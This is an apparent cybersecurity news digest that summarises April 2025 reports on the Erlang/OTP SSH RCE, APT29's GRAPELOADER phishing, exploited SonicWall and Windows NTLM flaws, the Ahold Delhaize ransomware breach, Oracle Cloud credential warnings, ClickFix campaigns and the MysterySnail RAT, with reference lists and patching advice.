CyberSecurity news

FlagThis

info@thehackernews.com (The@The Hacker News //
A critical security vulnerability, CVE-2025-32433, has been discovered in the Erlang/OTP SSH implementation, potentially allowing unauthenticated remote code execution (RCE). The flaw, which has been assigned a maximum CVSS score of 10.0, could enable attackers to execute arbitrary code on affected systems without providing any credentials. Researchers at Ruhr University Bochum, including Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk, identified the vulnerability. It stems from improper handling of SSH protocol messages, allowing attackers to send connection protocol messages prior to authentication, leading to a complete system compromise if the SSH daemon is running with root privileges.

The vulnerability affects all users running an SSH server based on the Erlang/OTP SSH library. According to the official Ericsson security advisory, any application providing SSH access using the Erlang/OTP SSH library should be considered affected. This vulnerability poses a significant risk, especially to critical infrastructure and high-availability systems where Erlang/OTP is widely used, such as in telecommunications equipment, industrial control systems, and connected devices. Expert Mayuresh Dani of Qualys emphasizes the critical nature, noting Erlang's frequent installation on high-availability systems. This vulnerability could allow actions such as installing ransomware or siphoning off sensitive data.

Proof-of-concept (PoC) exploits for CVE-2025-32433 have already been released, increasing the urgency for organizations to take immediate action. SecurityOnline reported the release of PoC code, and the Horizon3 Attack Team confirmed they had developed their own exploit, describing it as "surprisingly easy" to reproduce. Mitigation strategies include immediately updating to the patched versions: OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20. As a temporary workaround, it is recommended to disable the SSH server or restrict access via firewall rules until the updates can be applied. Organizations should evaluate their systems for potential compromise.

Recommended read:
References :
  • darkwebinformer.com: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • hackread.com: Researchers Find CVSS 10.0 Severity RCE Vulnerability in Erlang/OTP SSH
  • Open Source Security: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • Ubuntu security notices: USN-7443-1: Erlang vulnerability
  • BleepingComputer: Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now
  • Open Source Security: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • The Hacker News: TheHackerNews Article about CVSS 10.0 in Erlang/OTP SSH
  • The DefendOps Diaries: Explore the critical CVE-2025-32433 vulnerability in Erlang/OTP SSH, its impact, and mitigation strategies.
  • hackread.com: Researchers Find CVSS 10.0 Severity RCE Vulnerability in Erlang/OTP SSH
  • github.com: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.bleepingcomputer.com: Critical Erlang/OTP SSH pre-auth RCE is 'Surprisingly Easy' to exploit, patch now
  • securityonline.info: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.openwall.com: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • securityonline.info: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • Resources-2: Picus Security Blog on Erlang/OTP SSH RCE
  • Tenable Blog: Proof-of-concept code has been released after researchers disclosed a maximum severity remote code execution vulnerability in Erlang/OTP SSH. Successful exploitation could allow for complete takeover of affected devices. Background On April 16, Fabian Bäumer, Marcus Brinkmann, Marcel Maehren, and Jörg Schwenk of the Ruhr University Bochum in Germany disclosed a critical vulnerability in Erlang/OTP SSH to the vulnerability mailing list.
  • securityonline.info: SecurityOnline article on Erlang/OTP CVE-2025-32433 (CVSS 10): Critical SSH Flaw Allows Unauthenticated RCE
  • Security Risk Advisors: Unauthenticated Remote Code Execution in Erlang/OTP SSH (CVE-2025-32433).
  • securityonline.info: Erlang/OTP SSH Vulnerability (CVE-2025-32433).
  • Open Source Security: Re: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.runzero.com: Discusses an SSHamble with remote code execution in Erlang/OTP SSH.
  • Open Source Security: Re: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • Cyber Security News: Cybersecurity News also reported this vulnerability.
  • securityboulevard.com: Vulnerability in Erlang/OTP SSH allows for unauthenticated remote code execution on vulnerable devices.
  • The DefendOps Diaries: Understanding and Mitigating CVE-2025-32433: A Critical Erlang/OTP Vulnerability
  • www.scworld.com: Maximum severity flaw impacts Erlang/OTP SSH Widely used library Erlang/OTP SSH was discovered to be affected by a maximum severity flaw, tracked as CVE-2025-32433, which could be leveraged to allow code execution without required logins, according to Hackread.
  • Open Source Security: Seclists Details on SSH execution in Erlang
  • Blog: CyberReason article on Erlang/OTP RCE Vulnerability.
  • infosecwriteups.com: InfoSec Writeups: Erlang/OTP SSH CVSS 10 RCE
  • securityboulevard.com: CVE-2025-32433: Unauthenticated Remote Code Execution in Erlang/OTP SSH
  • www.bleepingcomputer.com: Critical Erlang/OTP SSH RCE bug now has public exploits, patch now
  • industrialcyber.co: Frenos warns OT sector of critical Erlang vulnerability enabling remote code execution affecting millions of devices
  • www.cybersecuritydive.com: Researchers warn of critical flaw found in Erlang OTP SSH
  • Arctic Wolf: CVE-2025-32433: Maximum Severity Unauthenticated RCE Vulnerability in Erlang/OTP SSH
  • arcticwolf.com: CVE-2025-32433: Maximum Severity Unauthenticated RCE Vulnerability in Erlang/OTP SSH
  • Industrial Cyber: Frenos warns OT sector of critical Erlang vulnerability enabling remote code execution affecting millions of devices
  • www.csoonline.com: Public exploits already available for a severity 10 Erlang SSH vulnerability; patch now
  • arcticwolf.com: CVE-2025-32433: Maximum Severity Unauthenticated RCE Vulnerability in Erlang/OTP SSH

info@thehackernews.com (The@The Hacker News //
APT29, a Russian state-sponsored hacking group also known as Cozy Bear or Midnight Blizzard, is actively targeting European diplomatic entities with a sophisticated phishing campaign that began in January 2025. The group is using deceptive emails disguised as invitations to wine-tasting events to entice recipients into downloading a malicious ZIP file. This archive, often named "wine.zip," contains a legitimate PowerPoint executable alongside malicious DLL files designed to compromise the victim's system. These campaigns appear to focus primarily on Ministries of Foreign Affairs, as well as other countries' embassies in Europe, with indications suggesting that diplomats based in the Middle East may also be targets.

The malicious ZIP archive contains a PowerPoint executable ("wine.exe") and two hidden DLL files. When the PowerPoint executable is run, it activates a previously unknown malware loader called GRAPELOADER through a technique known as DLL side-loading. GRAPELOADER then establishes persistence on the system by modifying the Windows Registry. It collects basic system information, such as username and computer name, and communicates with a command-and-control server to fetch additional malicious payloads. This technique allows the attackers to maintain access to the compromised systems.

GRAPELOADER distinguishes itself through its advanced stealth techniques, including masking strings in its code and only decrypting them briefly in memory before erasing them. This malware gains persistence by modifying the Windows registry’s Run key, ensuring that the "wine.exe" is executed automatically every time the system reboots. The ultimate goal of the campaign is to deliver a shellcode, with Check Point also identifying updated WINELOADER artifacts uploaded to the VirusTotal platform with compilation timestamps matching recent activity. The emails are sent from domains like bakenhof[.]com and silry[.]com.

Recommended read:
References :
  • Check Point Blog: Details on APT29's updated phishing campaign targeting European diplomatic organizations. Focus on new malware and TTPs
  • BleepingComputer: Russian state-sponsored espionage group Midnight Blizzard is behind a new spear-phishing campaign targeting diplomatic entities in Europe, including embassies.
  • bsky.app: Midnight Blizzard deploys new GrapeLoader malware in embassy phishing
  • blog.checkpoint.com: Unmasking APT29: The Sophisticated Phishing Campaign Targeting European Diplomacy
  • cyberpress.org: Detailed report about APT29's GRAPELOADER campaign targeting European diplomats.
  • research.checkpoint.com: Renewed APT29 Phishing Campaign Against European Diplomats
  • Cyber Security News: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • The Register - Security: Russians lure European diplomats into malware trap with wine-tasting invite
  • iHLS: Russian Phishing Campaign Steals Sensitive Data in European Government Networks
  • cybersecuritynews.com: APT29 Hackers Deploy GRAPELOADER in Latest Attack on European Diplomats
  • www.scworld.com: New APT29 spear-phishing campaign targets European diplomatic organizations
  • www.helpnetsecurity.com: Cozy Bear targets EU diplomats with wine-tasting invites (again)
  • Check Point Research: Renewed APT29 Phishing Campaign Against European Diplomats
  • Help Net Security: Detailed report on the campaign's tactics, techniques, and procedures, including the use of fake wine-tasting invitations.
  • securityonline.info: Sophisticated phishing campaign targeting European governments and diplomats, using a wine-themed approach
  • securityonline.info: APT29 Targets European Diplomats with Wine-Themed Phishing
  • www.csoonline.com: The tactics, techniques, and procedures (TTPs) observed in this campaign bear strong similarities to those seen in the previous WINELOADER campaign from March 2024, The report contains indicators of compromise such as file names, file hashes and C2 URLs that can be used by security teams to build detections and threat hunting queries.
  • Virus Bulletin: The campaign employs a new loader, called GRAPELOADER, which is downloaded via a link in the phishing email.
  • The Hacker News: The Hacker News reports on APT29 targeting European diplomats with wine-themed phishing emails and the GrapeLoader malware.
  • hackread.com: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats
  • ciso2ciso.com: Midnight Blizzard Targets European Diplomats with Wine Tasting Phishing Lure – Source: www.infosecurity-magazine.com
  • ciso2ciso.com: APT29 Targets European Diplomats with Wine-Themed Phishing
  • hackread.com: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats
  • thehackernews.com: The Russian state-sponsored threat actor known as APT29 has been linked to an advanced phishing campaign that's targeting diplomatic entities across Europe with a new variant of WINELOADER and a previously unreported malware loader codenamed GRAPELOADER.
  • www.techradar.com: European diplomats targeted by Russian phishing campaign promising fancy wine tasting
  • Talkback Resources: Talkback.sh discusses APT29 Deploys GRAPELOADER Malware Targeting European Diplomats Through Wine-Tasting Lures [mal]
  • Talkback Resources: Russian Cozy Bear’s Wine Lure Drops WineLoader Malware on EU Diplomats [social] [mal]
  • ciso2ciso.com: Midnight Blizzard Targets European Diplomats with Wine Tasting Phishing Lure – Source: www.infosecurity-magazine.com
  • securityaffairs.com: Russia-linked group APT29 targeted diplomatic entities across Europe with a new malware loader codenamed GRAPELOADER.
  • eSecurity Planet: Russian Hackers Target European Diplomats with ‘Wine-Tasting’ Phishing Scams
  • www.esecurityplanet.com: Russian Hackers Target European Diplomats with ‘Wine-Tasting’ Phishing Scams
  • Security Risk Advisors: Russia-Linked APT29 Targets European Diplomats with New GRAPELOADER Malware in Sophisticated Phishing Campaign
  • ciso2ciso.com: Russia-linked APT29 targets European diplomatic entities with GRAPELOADER malware – Source: securityaffairs.com

info@thehackernews.com (The@The Hacker News //
Since January 2025, threat actors have been actively exploiting a remote code execution vulnerability, CVE-2021-20035, in SonicWall Secure Mobile Access (SMA) appliances. This exploitation campaign targets the SMA100 management interface, allowing for OS command injection. Arctic Wolf researchers have been tracking this campaign, highlighting the significant risk it poses to organizations utilizing these affected devices due to the potential for credential access.

This vulnerability has now been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, underscoring the severity and ongoing nature of the threat. CISA urges prompt remediation by affected organizations. In addition to CVE-2021-20035, CISA has flagged another critical vulnerability, CVE-2024-53704, which compromises the SSL VPN authentication mechanism in SonicOS. This flaw, with a CVSS score of 9.3, enables attackers to hijack VPN sessions by sending crafted session cookies, bypassing multi-factor authentication and exposing private network routes.

CISA has issued a critical security alert urging federal agencies and network defenders to prioritize patching both CVE-2021-20035 and CVE-2024-53704 to prevent potential breach attempts. The Binding Operational Directive (BOD) 22-01 mandates that Federal Civilian Executive Branch (FCEB) agencies secure their networks against ongoing attacks within a specified timeframe. While this directive specifically targets U.S. federal agencies, CISA advises all network defenders to take immediate action to mitigate these risks.

Recommended read:
References :
  • chemical-facility-security-news.blogspot.com: CISA Adds SonicWall Vulnerability to KEV Catalog – 4-16-25
  • securityaffairs.com: U.S. CISA adds SonicWall SMA100 Appliance flaw to its Known Exploited Vulnerabilities catalog
  • The Hacker News: Details on the exploitation of the vulnerability
  • Cyber Security News: CISA Alerts on Exploited SonicWall Command Injection Vulnerabilityâ€
  • gbhackers.com: CISA Issues Alert on SonicWall Flaw Being Actively Exploited
  • BleepingComputer: On Wednesday, CISA warned federal agencies to secure their SonicWall Secure Mobile Access (SMA) 100 series appliances against attacks exploiting a high-severity remote code execution vulnerability. [...]
  • gbhackers.com: GBHackers: CISA Issues Alert on SonicWall Flaw Being Actively Exploited
  • securityonline.info: CISA Alert: Actively Exploited SonicWall SMA100 Vulnerability
  • The DefendOps Diaries: CISA flags critical SonicWall vulnerabilities: Urgent mitigation required to prevent cyber attacks
  • www.cybersecuritydive.com: Older SonicWall SMA100 vulnerability exploited in the wild
  • Arctic Wolf: Credential Access Campaign Targeting SonicWall SMA Devices Potentially Linked to Exploitation of CVE-2021-20035
  • Help Net Security: Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035)
  • Arctic Wolf: On April 15, 2025, SonicWall published a product notice regarding CVE-2021-20035, a vulnerability impacting SonicWall SMA 100 series appliances.
  • arcticwolf.com: On 15 April 2025, SonicWall published a product notice regarding CVE-2021-20035, a vulnerability impacting SonicWall SMA 100 series appliances.
  • The DefendOps Diaries: Understanding and Mitigating the SonicWall SMA Vulnerability
  • BleepingComputer: SonicWall SMA VPN devices targeted in attacks since January
  • bsky.app: A remote code execution vulnerability affecting SonicWall Secure Mobile Access (SMA) appliances has been under active exploitation since at least January 2025, according to cybersecurity company Arctic Wolf.
  • www.scworld.com: Cybersecurity Dive reports that active exploitation of the nearly half a decade-old high-severity SonicWall SMA100 remote-access appliance operating system command injection flaw
  • www.helpnetsecurity.com: Sonicwall SMA100 vulnerability exploited by attackers (CVE-2021-20035)
  • securityaffairs.com: CISA adds SonicWall SMA100 Appliance flaw to its Known Exploited Vulnerabilities catalog.
  • Help Net Security: CVE-2021-20035, an old vulnerability affecting Sonicwall Secure Mobile Access (SMA) 100 series appliances, is being exploited by attackers.
  • arcticwolf.com: Details the credential access campaign targeting SonicWall SMA devices and its potential link to CVE-2021-20035 exploitation.
  • securityaffairs.com: Threat actors are actively exploiting a remote code execution flaw in SonicWall Secure Mobile Access (SMA) appliances since January 2025.
  • securityaffairs.com: Security Affairs newsletter reports attackers exploited SonicWall SMA appliances since January 2025
  • www.bleepingcomputer.com: SonicWall SMA VPN devices targeted in attacks since January

Zeljka Zorz@Help Net Security //
Microsoft is warning Windows users about a actively exploited vulnerability, CVE-2025-24054, which allows attackers to capture NTLMv2 responses. This can lead to the leakage of NTLM hashes and potentially user passwords, compromising systems. The vulnerability is exploited through phishing attacks utilizing maliciously crafted .library-ms files, prompting users to interact with the files through actions like right-clicking, dragging and dropping, or simply navigating to the folder containing the malicious file. The original version,NTLMv1, had several security flaws that made it vulnerable to attacks such aspass-the-hashandrainbow table attacks.

Attackers have been actively exploiting CVE-2025-24054 since March 19, 2025, even though Microsoft released a patch on March 11, 2025. Active exploitation has been observed in campaigns targeting government entities and private institutions in Poland and Romania between March 20 and 21, 2025. The attack campaign used email phishing links to distribute a Dropbox link containing an archive file that exploits the vulnerability, which harvests NTLMv2-SSP hashes.

The captured NTLMv2 response, can be leveraged by attackers to attempt brute-force attacks offline or to perform NTLM relay attacks, which fall under the category of man-in-the-middle attacks. NTLM relay attacks are much more dangerous when the stolen credentials belong to a privileged user, as the attacker is using it for privilege escalation and lateral movement on the network. Microsoft released a patch on March 11, 2025 addressing the vulnerability with users being advised to apply the patches.

Recommended read:
References :
  • Check Point Research: CVE-2025-24054, NTLM Exploit in the Wild
  • The DefendOps Diaries: Understanding the CVE-2025-24054 Vulnerability: A Critical Threat to Windows Systems
  • BleepingComputer: Windows NTLM hash leak flaw exploited in phishing attacks on governments
  • bsky.app: Windows NTLM hash leak flaw exploited in phishing attacks on governments
  • research.checkpoint.com: CVE-2025-24054, NTLM Exploit in the Wild
  • Talkback Resources: Research team analysis of CVE-2025-24054
  • Help Net Security: Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054)
  • www.helpnetsecurity.com: Windows NTLM vulnerability exploited in multiple attack campaigns (CVE-2025-24054)
  • bsky.app: BSky Post on CVE-2025-24054, NTLM Exploit in the Wild
  • Cyber Security News: CyberSecurityNews - Hackers Exploiting Windows NTLM Spoofing Vulnerability in Wild to Compromise Systems
  • The Hacker News: CVE-2025-24054 Under Active Attack—Steals NTLM Credentials on File Download
  • MSSP feed for Latest: Windows NTLM Hash Flaw Targeted in Global Phishing Attacks
  • gbhackers.com: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) alerted organizations to active exploitation of a newly disclosed Microsoft Windows vulnerability tracked as CVE-2025-24054.
  • infosecwriteups.com: Your NTLM Hashes at Risk: Inside CVE‑2025‑24054
  • BetaNews: CISA adds Windows NTLM hash disclosure spoofing flaw to its Known Exploited Vulnerabilities Catalog
  • www.scworld.com: Cybersecurity News reports on alarms sounding over attacks via Microsoft NTLM vulnerability, impacting Poland and Romania.
  • securityaffairs.com: U.S. CISA adds Apple products and Microsoft Windows NTLM flaws to its Known Exploited Vulnerabilities catalog
  • gbhackers.com: CISA Warns of Active Exploitation of Windows NTLM Vulnerability
  • Techzine Global: Windows vulnerability with NTLM hash abuse exploited for phishing
  • betanews.com: CISA adds Windows NTLM hash disclosure spoofing flaw to its Known Exploited Vulnerabilities Catalog
  • ciso2ciso.com: Fresh Windows NTLM Vulnerability Exploited in Attacks – Source: www.securityweek.com
  • malware.news: Phishing campaigns abuse Windows NTLM hash leak bug

@x.com //
Ahold Delhaize, the multinational retail and wholesale company with operations in both Europe and the United States, has confirmed a data breach following a cyberattack in November 2024. The company, which owns supermarket brands such as Stop & Shop, Giant Food, Food Lion and Hannaford, acknowledged that certain files were stolen from its U.S. business systems. The breach was claimed by the INC ransomware group, which has threatened to release sensitive information if its demands are not met, according to researchers at Arctic Wolf. The company is currently working with outside forensics experts to determine the exact nature of the compromised data and to comply with legal obligations regarding disclosure to affected individuals.

The cyberattack disrupted e-commerce operations, particularly affecting Hannaford's pickup and delivery services, which were halted for several days. Other U.S. banners also experienced disruptions and reduced availability for e-commerce services due to "system outages." While physical stores remained open and continued to accept most payment methods, including credit cards, Ahold Delhaize took some systems offline to protect them. The company also notified and updated law enforcement about the incident.

The INC ransomware group claims to have exfiltrated approximately 6 terabytes of data from Ahold Delhaize's U.S. division. This data includes sensitive documents and personal identifiers, raising concerns about potential misuse and privacy violations. Ahold Delhaize is advising customers to be vigilant for phishing attempts and fraudulent activity. The company is currently investigating the extent of the breach and is committed to taking necessary measures to contain the situation and prevent further unauthorized access.

Recommended read:
References :
  • The DefendOps Diaries: Ahold Delhaize Cyberattack: A Deep Dive into the Ransomware Breach
  • BleepingComputer: Ahold Delhaize confirms data theft after INC ransomware claims attack
  • www.cybersecuritydive.com: Ahold Delhaize confirms data stolen after threat group claims credit for November attack
  • www.scworld.com: Data breach confirmed by Ahold Delhaize after INC ransomware claims
  • Cyber Security News: Ahold Delhaize data breach in November 2024.
  • bsky.app: Food retail giant Ahold Delhaize confirms that data was stolen from its U.S. business systems during a November 2024 cyberattack.
  • gbhackers.com: GBHackers articles about Ahold Data stolen
  • www.techradar.com: Food retail giant behind several major US supermarket brands confirms data stolen in major ransomware breach
  • thecyberexpress.com: Ahold Delhaize USA, the parent company of several well-known American supermarket brands, has confirmed that data was stolen during a cyberattack that took place in the fall of 2024.
  • newsroom.aholddelhaize.com: Ahold Delhaize updates statement on Nov. 8, 2024 cybersecurity issue
  • Check Point Research: For the latest discoveries in cyber research for the week of 21st April, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Retail giant Ahold Delhaize has suffered a cyber-attack resulting in data theft of customer information from its US business systems. The attack, claimed by ransomware group INC Ransom, impacted Ahold Delhaize USA […]
  • eSecurity Planet: Retail giant Ahold Delhaize has suffered a cyber-attack resulting in data theft of customer information from its US business systems.
  • thecyberexpress.com: The INC Ransom gang claimed responsibility for the cyberattack on Ahold Delhaize.
  • Davey Winder: Ahold Delhaize USA, the parent company of several well-known American supermarket brands, has confirmed that data was stolen during a cyberattack that took place in the fall of 2024.

David Jones@cybersecuritydive.com //
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning on April 17, 2025, regarding increased breach risks following a potential compromise of legacy Oracle Cloud servers. This alert comes in response to public reporting of alleged threat activity targeting Oracle customers, though the scope and impact of the activity are currently unconfirmed. CISA's guidance urges organizations and individuals to take immediate steps to secure their IT environments amid claims of a large trove of customer credentials being compromised. The agency is also asking organizations to come forward if they detect suspicious activity or other evidence of a compromise.

CISA is particularly concerned about situations where credential material may be exposed, reused across separate and unaffiliated systems, or embedded into applications and tools. Embedded credential material, which can be hardcoded into scripts, applications, infrastructure templates, or automation tools, is especially difficult to detect and can enable long-term unauthorized access if exposed. The compromise of credentials like usernames, emails, passwords, authentication tokens, and encryption keys can pose a significant risk to enterprise environments.

To mitigate these risks, CISA recommends organizations reset passwords for known affected users, especially those not federated through enterprise identity solutions. Additionally, they should review source code, infrastructure as code templates, automation scripts, and configuration files for hardcoded credentials, replacing them with secure authentication methods supported by centralized secret management. Monitoring authentication logs for anomalous activity, particularly using privileged, service, or federated identity accounts, is also crucial. Finally, CISA advises enforcing phishing-resistant multi-factor authentication for all user and administrator accounts whenever possible.

Recommended read:
References :
  • DataBreaches.Net: Sergiu Gatlan reports: On Wednesday, CISA warned of heightened breach risks after the compromise of legacy Oracle Cloud servers earlier this year and highlighted the significant threat to enterprise networks. CISA said, “the nature of the reported activity presents potential risk to organizations and individuals, particularly where credential material may be exposed, reused across separate,...
  • BleepingComputer: On Wednesday, CISA warned of heightened breach risks after the compromise of legacy Oracle Cloud servers earlier this year and highlighted the significant threat to enterprise networks.
  • www.cybersecuritydive.com: The agency is asking organizations to come forward if they detect suspicious activity or other evidence of a compromise.
  • MSSP feed for Latest: Legacy Oracle cloud breach poses credential exposure risk
  • hackread.com: Following reports of unauthorized access to a legacy Oracle cloud environment, CISA warns of potential credential compromise leading…
  • www.scworld.com: Secure legacy Oracle cloud credentials amid leak reports, CISA warns
  • www.itpro.com: CISA issues warning in wake of Oracle cloud credentials leak
  • securityonline.info: CISA Warns of Credential Risks Tied to Oracle Cloud Breach
  • The Register - Security: Oracle hopes talk of cloud data theft dies off. CISA just resurrected it for Easter
  • securityonline.info: CISA Warns of Credential Risks Tied to Oracle Cloud Breach
  • The DefendOps Diaries: Understanding the Oracle Cloud Breach: CISA's Guidance and Recommendations
  • ciso2ciso.com: CISA Urges Action on Potential Oracle Cloud Credential Compromise
  • ciso2ciso.com: Following reports of unauthorized access to a legacy Oracle cloud environment, CISA warns of potential credential compromise leading to phishing, network breaches, and data theft.

@gbhackers.com //
State-sponsored hacking groups from North Korea, Iran, and Russia are now widely employing the ClickFix social engineering tactic in their espionage campaigns. This technique, previously associated with cybercriminals, involves tricking users into copying, pasting, and running malicious commands, often through fake error messages and instructions. Proofpoint researchers first documented this shift over a three-month period from late 2024 to early 2025, noting that ClickFix has become an effective means of bypassing traditional security measures. This tactic replaces installation and execution stages in existing infection chains.

The adoption of ClickFix has been observed in various campaigns, each tailored to the specific objectives and targets of the respective state-sponsored actors. For instance, the North Korean actor TA427, also known as Kimsuky, utilized ClickFix in phishing campaigns targeting think tanks involved in North Korean affairs. By impersonating diplomatic personnel and leveraging spoofed document sharing platforms, TA427 successfully deployed the Quasar RAT, a remote access trojan. Meanwhile, Iranian group TA450 (MuddyWater) targeted organizations in the Middle East by masquerading as Microsoft security updates, deploying remote management tools for espionage and data exfiltration.

Russian-linked groups, including UNK_RemoteRogue and TA422 (APT28), have also experimented with ClickFix, indicating its growing appeal across different nation-state actors. The simplicity and effectiveness of ClickFix, which relies on user interaction rather than sophisticated technical exploits, makes it a valuable tool for these groups. While not all groups have persistently used ClickFix after initial tests, its adoption by multiple state-sponsored actors underscores the evolving threat landscape and the need for heightened vigilance against social engineering tactics. This trend suggests that ClickFix, and similar user-interactive attack methods, will continue to pose a significant threat in the future.

Recommended read:
References :
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware
  • www.scworld.com: Attacks leveraging the ClickFix social engineering technique have been increasingly conducted by state-backed threat operations to facilitate malware infections over the past few months, reports The Hacker News.
  • www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
  • cyberpress.org: State-Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
  • cybersecuritynews.com: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • Cyber Security News: State Sponsored Hackers Now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • Cyber Security News: State Sponsored Hackers Widely Deploy ClickFix Attack in Espionage Campaigns
  • www.techradar.com: State-sponsored actors spotted using ClickFix hacking tool developed by criminals
  • BleepingComputer: ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks.
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: State-Backed Hackers from North Korea, Iran and Russia Use ClickFix in New Espionage Campaigns
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
  • www.bleepingcomputer.com: State-sponsored hackers embrace ClickFix social engineering tactic
  • sra.io: Beware of ClickFix: A Growing Social Engineering Threat
  • The DefendOps Diaries: The Rise of ClickFix: A New Social Engineering Threat
  • Anonymous ???????? :af:: ClickFix attacks are gaining traction among threat actors, with multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia adopting the technique in recent espionage campaigns.

@poliverso.org //
Chinese-speaking IronHusky hackers are actively targeting government organizations in Russia and Mongolia using an upgraded version of the MysterySnail remote access trojan (RAT) malware. Security researchers at Kaspersky's Global Research and Analysis Team (GReAT) recently discovered this updated implant during investigations into attacks utilizing a malicious MMC script disguised as a Word document. This script downloads second-stage payloads and establishes persistence on compromised systems, indicating a continued focus on espionage and data theft by the APT group.

This new version of MysterySnail RAT includes an intermediary backdoor that facilitates file transfers between command and control servers and infected devices, allowing attackers to execute commands. The IronHusky group is abusing the legitimate piping server (ppng[.]io) to request commands and send back their execution results. This technique helps the attackers to evade detection by blending malicious traffic with normal network activity, highlighting the sophisticated methods employed by the threat actor.

The MysterySnail RAT, initially discovered in 2021, has undergone significant evolution, demonstrating its adaptability and the persistent threat it poses. Despite a period of relative obscurity after initial reports, the RAT has re-emerged with updated capabilities targeting specific geopolitical interests. The continuous refinement and deployment of this malware underscores the ongoing cyber espionage activities carried out by the IronHusky APT group, with a particular focus on Russian and Mongolian government entities.

Recommended read:
References :
  • Securelist: MysterySnail RAT attributed to IronHusky APT group hasn’t been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.
  • The DefendOps Diaries: The MysterySnail RAT: An Evolving Cyber Threat
  • BleepingComputer: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
  • Know Your Adversary: 108. Hunting for Node.js Abuse
  • bsky.app: Chinese-speaking IronHusky hackers are targeting Russian and Mongolian government organizations using upgraded MysterySnail remote access trojan (RAT) malware.
  • www.kaspersky.com: Provides threat intelligence about the IronHusky APT group.
  • poliverso.org: IronHusky updates the forgotten MysterySnail RAT to target Russia and Mongolia
  • threatmon.io: Threatpost reports on Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
  • hackread.com: Kaspersky researchers report the reappearance of MysterySnail RAT, a malware linked to Chinese IronHusky APT, targeting Mongolia and…
  • securityonline.info: IronHusky APT Resurfaces with Evolved MysterySnail RAT
  • securityonline.info: IronHusky APT Resurfaces with Evolved MysterySnail RAT
  • Talkback Resources: The MysterySnail RAT, linked to Chinese IronHusky APT, has resurfaced targeting government entities in Mongolia and Russia with a new version capable of executing 40 commands for malicious activities and deploying a modified variant named MysteryMonoSnail.
  • securityaffairs.com: Chinese APT IronHusky Deploys Updated MysterySnail RAT on Russia
  • securelist.com: Kaspersky report on IronHusky updates the forgotten MysterySnail RAT
  • www.scworld.com: Stealthy multi-stage malware attack, updated MysterySnail RAT uncovered
  • securityaffairs.com: Malicious payloads have been distributed as part of a new covert multi-stage intrusion while Chinese advanced persistent threat operation IronHusky has been targeting Russian and Mongolian government entities with an upgraded MysterySnail RAT variant, reports The Hacker News.

@The DefendOps Diaries //
The Interlock ransomware gang is actively employing ClickFix attacks to infiltrate corporate networks and deploy file-encrypting malware. This social engineering tactic tricks users into executing malicious PowerShell commands, often under the guise of fixing an error or verifying their identity. By impersonating legitimate IT tools, Interlock bypasses traditional security measures that rely on automated detection, as the malicious code is executed manually by the victim. This represents a significant shift in the cyber threat landscape, highlighting the importance of understanding and defending against these evolving tactics.

ClickFix attacks involve manipulating users through deceptive prompts, such as fake error messages, CAPTCHA verifications, or system update requests. Victims are tricked into copying and pasting harmful commands into their systems, leading to the silent installation of malware. Interlock has been observed using fake browser and VPN client updates to deliver malware, and even uses compromised websites to redirect users to fake popup windows. These windows ask the user to paste scripts into a PowerShell terminal, initiating the malware infection process.

While the infrastructure supporting Interlock's ClickFix campaigns appears dormant since February 2025, the group's use of this technique signals ongoing innovation in their delivery mechanisms. This, combined with their consistent use of credential-stealing malware like LummaStealer and BerserkStealer, and a proprietary Remote Access Trojan (RAT), demonstrates Interlock's sophisticated approach to breaching networks. Organizations must enhance their security awareness training and implement measures to detect and prevent users from falling victim to ClickFix and other social engineering tactics.

Recommended read:
References :
  • securityonline.info: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • The DefendOps Diaries: The Rise of ClickFix Attacks: Understanding the Interlock Ransomware Gang
  • BleepingComputer: Interlock ransomware gang pushes fake IT tools in ClickFix attacks
  • www.scworld.com: ClickFix increasingly utilized in state-backed malware attacks
  • cyberpress.org: Interlock Ransomware Delivers Malicious Browser Updates via Multi-Stage Attack on Legitimate Websites
  • gbhackers.com: Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates
  • Cyber Security News: Reports show the latest ClickFix attack.
